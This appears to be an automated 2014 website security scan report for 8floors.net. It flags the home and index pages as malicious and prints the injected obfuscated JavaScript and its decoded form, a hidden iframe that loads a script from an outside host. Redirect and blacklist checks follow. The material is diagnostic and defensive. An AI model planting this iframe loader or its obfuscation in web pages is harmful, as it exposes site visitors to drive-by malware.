Scanned pages/files
| Request | Server response | Status |
http://8floors.net/ | 200 OK Content-Length: 14997 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{abre++}catch(a6ba34y){try{dsgsdh&2}catch(asab){e=window[""+"e"+"val"];}} if(1){f=[-4,-5,90,89,18,25,87,97,84,104,95,86,97,102,31,90,87,101,56,94,86,96,87,95,103,101,51,108,70,82,90,64,82,96,87,25,26,84,96,87,107,24,28,77,33,80,27,108,0,-5,-6,-4,91,87,101,83,94,88,100,25,28,45,-2,-4,-5,110,19,87,93,102,87,17,110,-1,-6,-4,-5,85,98,85,102,96,87,95,103,32,104,101,91,101,88,26,19,47,91,87,101,83,94,88,18,100,101,85,46,26,90,101,103,98,43,34,33,106,106,108,91,105,99,100,102,104,31,96,107,87,10 Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://ywzjvqssv.myfw.us/t/vc.php?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://ywzjvqssv.myfw.us/t/vc.php?go=2');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width <iframe src='http://ywzjvqssv.myfw.us/t/vc.php?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://8floors.net/test404page.js | 404 Not Found Content-Length: 1144 Content-Type: text/html | clean |
http://8floors.net/index.php | 200 OK Content-Length: 14997 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{abre++}catch(a6ba34y){try{dsgsdh&2}catch(asab){e=window[""+"e"+"val"];}} if(1){f=[-4,-5,90,89,18,25,87,97,84,104,95,86,97,102,31,90,87,101,56,94,86,96,87,95,103,101,51,108,70,82,90,64,82,96,87,25,26,84,96,87,107,24,28,77,33,80,27,108,0,-5,-6,-4,91,87,101,83,94,88,100,25,28,45,-2,-4,-5,110,19,87,93,102,87,17,110,-1,-6,-4,-5,85,98,85,102,96,87,95,103,32,104,101,91,101,88,26,19,47,91,87,101,83,94,88,18,100,101,85,46,26,90,101,103,98,43,34,33,106,106,108,91,105,99,100,102,104,31,96,107,87,10 Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://ywzjvqssv.myfw.us/t/vc.php?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://ywzjvqssv.myfw.us/t/vc.php?go=2');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width <iframe src='http://ywzjvqssv.myfw.us/t/vc.php?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 8floors.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 04 Sep 2014 14:55:22 GMT
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html
X-Powered-By: PHP/5.3.27
X-Powered-By: PleskLin
GET / HTTP/1.1
Host: 8floors.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 04 Sep 2014 14:55:22 GMT
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html
X-Powered-By: PHP/5.3.27
X-Powered-By: PleskLin
Second query (visit from search engine):
GET / HTTP/1.1
Host: 8floors.net
Referer: http://www.google.com/search?q=8floors.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 8floors.net
Referer: http://www.google.com/search?q=8floors.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=8floors.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://8floors.net/
Result: 8floors.net is not infected or malware details are not published yet.
Result: 8floors.net is not infected or malware details are not published yet.